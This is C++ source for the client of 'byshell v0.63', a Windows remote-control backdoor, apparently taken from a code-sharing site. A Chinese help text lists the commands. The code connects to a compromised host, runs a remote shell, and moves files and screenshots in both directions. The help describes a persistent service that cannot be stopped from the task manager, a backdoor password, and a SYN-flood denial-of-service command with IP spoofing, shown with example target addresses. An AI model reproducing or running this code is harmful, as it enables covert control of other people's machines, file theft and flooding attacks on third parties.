📄 063cli.cpp
字号:
//byshell v0.63 cli
#include <stdio.h>
#include <iostream.h>
#pragma comment(lib, "ws2_32.lib")
#include <winsock2.h>
#include <stdlib.h>
#include <stdio.h>
char pwd[16]="by";char buff[66000]={0};char ip[31]={0};HANDLE filefp;unsigned int packnum=0;
char work(char * workbuff,unsigned int workbufflen,char workflag,int * psendlength);
void helpview(void);
void main(void){int ret;char workflag=0;
//printf("\tbyshell client ver 0.63\ntype HELP to view the detailed manual.\n");
printf("please input the server ip address\n");
gets(ip);printf("%s will be connected\n",ip);
WSADATA WSAData;WSAStartup(MAKEWORD(2,2),&WSAData);
SOCKET sock=socket(AF_INET,SOCK_STREAM,0);
sockaddr_in cliaddr;memset(&cliaddr,0,sizeof(struct sockaddr_in));
cliaddr.sin_family= AF_INET;
cliaddr.sin_port =0;
cliaddr.sin_addr.S_un.S_addr = INADDR_ANY;
sockaddr_in srvaddr;memset(&srvaddr,0,sizeof(struct sockaddr_in));
srvaddr.sin_family= AF_INET;
srvaddr.sin_port = htons(138);
srvaddr.sin_addr.S_un.S_addr = inet_addr(ip);
bind(sock,(struct sockaddr *)&cliaddr,sizeof(struct sockaddr));
ret=connect(sock,(struct sockaddr *)&srvaddr,sizeof(struct sockaddr));
if(ret==-1){printf("connect failed,check your network and remote ip.");exit(0);}
printf("input the password(the default one is \'by\')\n");
gets(pwd);int sendlength=65536;int recvlen=0;
//gets not include the \r,but scanf will
while(1){strncpy(buff,pwd,16);//copy pass before work,for chpass
workflag=work(buff+32,recvlen-32,workflag,&sendlength);sendlength+=32;
memcpy(buff+28,&sendlength,4);
if(sendlength!=send(sock,buff,sendlength,0)){printf("fatal error in transmission\n");exit(0);}
memset(buff,0,65536); recvlen=recv(sock,buff,65536,0);int duelen;memcpy(&duelen,buff+28,4);
while(duelen>recvlen){recvlen+=recv(sock,buff+recvlen,65536-recvlen,0);}//solve data division
}
}
//__finally{closesocket(sock);}
//now these are work codes.
char work(char * workbuff,unsigned int workbufflen,char workflag,int * psendlength){
if(workflag==0){printf("%s",workbuff);
lab1: memset(workbuff,0,65536);printf("#");gets(workbuff);*psendlength=strlen(workbuff);
if(!strncmp(workbuff,"HELP",4) || !strncmp(workbuff,"help",4)){helpview();goto lab1;}
if(!strncmp(workbuff,"shell",5)){return 1;}
if(!strncmp(workbuff,"chpass",6)){strncpy(pwd,workbuff+6,16);return 0;}
//get\tDES\tSRC,
if(!strncmp(workbuff,"get",3)){packnum=0;char desfile[255]={0};char srcfile[255]={0};
sscanf(workbuff,"get\t%s\t%s",desfile,srcfile);
filefp=CreateFile(desfile,GENERIC_WRITE,0,0,CREATE_ALWAYS,FILE_ATTRIBUTE_NORMAL,0);
memset(workbuff+3,0,514);strcat(workbuff,srcfile);*psendlength=strlen(workbuff);
return 2;}
//put\tDES\tSRC
if(!strncmp(workbuff,"put",3)){packnum=0;char desfile[255]={0};char srcfile[255]={0};
sscanf(workbuff,"put\t%s\t%s",desfile,srcfile);
filefp=CreateFile(srcfile,GENERIC_READ,0,0,OPEN_EXISTING,FILE_ATTRIBUTE_NORMAL,0);
if(filefp==INVALID_HANDLE_VALUE){printf("no such local file.\n");goto lab1;}
memset(workbuff+3,0,514);strcat(workbuff,desfile);*psendlength=strlen(workbuff);
return 3;}
if(!strncmp(workbuff,"screen",6)){packnum=0;
filefp=CreateFile("c:\\remotedesktop.bmp",GENERIC_WRITE,0,0,CREATE_ALWAYS,FILE_ATTRIBUTE_NORMAL,0);
*psendlength=strlen(workbuff);return 4;
}
return 0;
}
//
if(workflag==1){printf("%s",workbuff);memset(workbuff,0,65536);
gets(workbuff);strcat(workbuff,"\r\n");*psendlength=strlen(workbuff);
if(!strncmp(workbuff,"endshell",8)){return 0;}
return 1;
}
//get
if(workflag==2){unsigned int rcvpacknum=0;memcpy(&rcvpacknum,workbuff,4);
if(!strncmp(workbuff,"no such file\n\0",14) && packnum==0){CloseHandle(filefp);printf("no such file\n");memset(workbuff,0,65536);goto lab1;}
//data division,especially TCP division,is BAD for us
if(rcvpacknum!=packnum+1){printf("packet dropped,redirecting");memset(workbuff,0,65536);strcpy(workbuff,"redirect");packnum+=1;memcpy(workbuff+8,&packnum,4);packnum-=1;*psendlength=12;return 2;}
DWORD byteswritten;WriteFile(filefp,workbuff+5,workbufflen-5,&byteswritten,0);if(byteswritten!=workbufflen-5){printf("warning:file system error\n");}
if(workbuff[4]!='f'){packnum+=1;memset(workbuff,0,65536);packnum+=1;memcpy(workbuff,&packnum,4);packnum-=1;printf(".");*psendlength=5;return 2;}
printf("file downloaded.\n");CloseHandle(filefp);goto lab1;
}
//put
//redirect
if(workflag==3 && strncmp(workbuff,"redirect",8)==0){unsigned int reqpacknum=0;memcpy(&reqpacknum,workbuff+8,4);memset(workbuff,0,65520);
packnum=reqpacknum-1;SetFilePointer(filefp,4000*packnum,0,FILE_BEGIN);
DWORD bytesread;ReadFile(filefp,workbuff+5,4000,&bytesread,0);
if(bytesread==4000){packnum+=1;memcpy(workbuff,&reqpacknum,4);*psendlength=4005;return 3;}
memcpy(workbuff,&reqpacknum,4);workbuff[4]='f';CloseHandle(filefp);*psendlength=5+bytesread;return 0;
}
if(workflag==3){unsigned int reqpacknum=0;memcpy(&reqpacknum,workbuff,4);
if(!strncmp(workbuff,"no privilege to write\n",21) && packnum==0){CloseHandle(filefp);printf("no privilege to write\n");memset(workbuff,0,65536);goto lab1;}
if(!strncmp(workbuff,"file system error\n",17)){CloseHandle(filefp);printf("file system error\n");memset(workbuff,0,65536);goto lab1;}
if(reqpacknum!=packnum+1){memset(workbuff,0,65536);strcpy(workbuff,"packet dropped\n");*psendlength=strlen(workbuff);return 3;}//check,but not solve
DWORD bytesread;ReadFile(filefp,workbuff+5,4000,&bytesread,0);
if(bytesread==4000){packnum+=1;memcpy(workbuff,&reqpacknum,4);printf(".");*psendlength=4005;return 3;}
memcpy(workbuff,&reqpacknum,4);workbuff[4]='f';CloseHandle(filefp);*psendlength=5+bytesread;return 0;
}
//screen
if(workflag==4){unsigned int rcvpacknum=0;memcpy(&rcvpacknum,workbuff,4);
if(rcvpacknum!=packnum+1){CloseHandle(filefp);printf("packet dropped\n");return 0;}//check,but not solve
DWORD byteswritten;WriteFile(filefp,workbuff+5,workbufflen-5,&byteswritten,0);printf(".");if(byteswritten!=workbufflen-5){printf("warning:file system error\n");}
if(workbuff[4]!='f'){packnum+=1;memset(workbuff,0,65536);packnum+=1;memcpy(workbuff,&packnum,4);packnum-=1;*psendlength=4;return 4;}
CloseHandle(filefp);printf("OK\n");goto lab1;
}
return 0;
}
void helpview(void){
cout << " BYshell v0.63" <<endl;
cout << " author:b.y" <<endl;
cout << " byshell v0.61A是一个完全SDK编写的远程控制软件,作者允许此软件及其源代码自由传播,但引用时应注明原出处。在联系作者并得到同意之前,不得将此软件改编或删选后用作商业用途,但可用作学习和私人用途。" <<endl;
cout << " 本软件部分功能仅仅支持NT以上的Wind0wZ系统。bycli.exe为客户端(控制方),而byshell.exe为服务端(被控制端)。第一次使用时,在服务端执行byshell.exe -install,以后当服务端上网,byshell会以服务自动启动,此服务不能在进程管理器中停止。要删除服务,在服务端使用byshell.exe -remove,byshell就会被清除。" <<endl;
cout << " byshell v0.61A是一个稳定版本,在文件传输,命令映射等功能上相比byshell v0.61有了很大的改进和提高,修正了已知的几乎所有BUG和缺陷。" <<endl;
cout << " 符号#是这个软件的命令提示符。目前支持的命令:" <<endl;
cout << "cmd 在此后跟你要执行的cmd命令,注意:只能执行一条单独的命令。仅仅支持NT以上的Wind0wZ系统。" <<endl;
cout << " eg. #cmddir c:\\winnt" <<endl;
cout << "shell 输入此命令后,进入交互的远程cmd,直到键入endshell返回#提示符。仅仅支持NT以上的Wind0wZ系统。" <<endl;
cout << "endshell 从shell状态返回#提示符。" <<endl;
cout << "chpass 改变后门密码。默认为“by”。" <<endl;
cout << " eg. #chpass123456" <<endl;
cout << "byver 查看连接的服务端的版本,新旧版本的客户服务端间交互时,可能有严重的兼容性问题。" <<endl;
cout << "sysinfo 取得对方的基本系统信息。" <<endl;
cout << "pslist 对方进程列表。" <<endl;
cout << "pskill 杀死对方指定进程。在此后跟你要杀死的进程的PID(由pslist得到)。" <<endl;
cout << " eg. #pskill972" <<endl;
cout << "modlist 对方指定进程加载的所有DLL的列表。在此后跟你要查看的进程的PID(由pslist得到)。" <<endl;
cout << " eg. #modlist972" <<endl;
cout << "get 在此软件的连接上下载远程文件。命令格式:" <<endl;
cout << " get <tab键> 本地保存文件名 <tab键> 远程下载文件名" <<endl;
cout << " eg. #get c:\\download\\file.txt d:\\sourcefile.txt" <<endl;
cout << "put 在此软件的连接上向远程上传文件。命令格式:" <<endl;
cout << " put <tab键> 远程保存文件名 <tab键> 本地上传文件名" <<endl;
cout << " eg. #put d:\\receive\file.txt c:\\sourcefile.txt" <<endl;
cout << "screen 远程截屏到本地,保存为“c:\\remotedesktop.bmp”文件,由此可查看远程桌面。" <<endl;
cout << " 搞笑功能,开怀一笑:" <<endl;
cout << "popmsg 弹出信息框。" <<endl;
cout << " eg. #popmsghello,are you all right?" <<endl;
cout << "swapmouse 远程鼠标左右键交换。" <<endl;
cout << "storemouse 远程鼠标左右键复原。" <<endl;
cout << "hidesys 隐藏远程桌面和任务栏。" <<endl;
cout << "showsys 恢复远程桌面和任务栏。" <<endl;
cout <<endl;
cout << "警告:以下的SYN功能有一定的危险性,仅仅用做测试。如果用户非法使用此功能攻击合法站点,将自己承担全部法律后果。" <<endl;
cout << "SYN 使用服务端发起SYN洪水的拒绝服务攻击测试。" <<endl;
cout << "参数:SYN 测试对象 测试的分钟数 IP伪造类型(可选参数,0是完全伪造,1是C段伪造,2是不伪造,默认为0) 攻击对象端口(可选参数,默认为80WWW端口) 使用的端口(可选参数,0是随机变化,默认为0)\n";
cout << "如果选择了某个可选参数,那么在它左边的可选参数就必须被选择,在它右边的可选参数则可以忽略。" <<endl;
cout << " eg. #SYN 172.18.1.5 15" <<endl;
cout << " eg. #SYN 172.18.1.5 15 1" <<endl;
cout << " eg. #SYN 172.18.1.5 15 1 445 12345" <<endl;
cout << "queryDOS 查询服务端SYN攻击测试的详细情况。" <<endl;
cout << "endDOS 强制结束服务端的SYN作业。" <<endl;
cout << "\n 由于作者是初学者,水平有限,程序一定存在很多BUG。谢谢各位朋友、前辈指教:" <<endl;
cout << " 华东师大软件学院04级 白远方 baiyuanfan@163.com" <<endl;
cout << "注:screen功能中用到的DDBtoDIB代码来源为xfocus.net的网友hzzh,著作权归他所有。" <<endl;
cout << " 特别感谢在我写这个小软件时给了我很大帮助的gxisone(谷夕),glacier(黄鑫)和xfocus.net的所有朋友,是他们的支持使我这个初学者能够克服困难和疑惑,最终完成这个程序。" <<endl;
cout << "" <<endl;
}
⌨️ 快捷键说明
复制代码
Ctrl + C
搜索代码
Ctrl + F
全屏模式
F11
切换主题
Ctrl + Shift + D
显示快捷键
?
增大字号
Ctrl + =
减小字号
Ctrl + -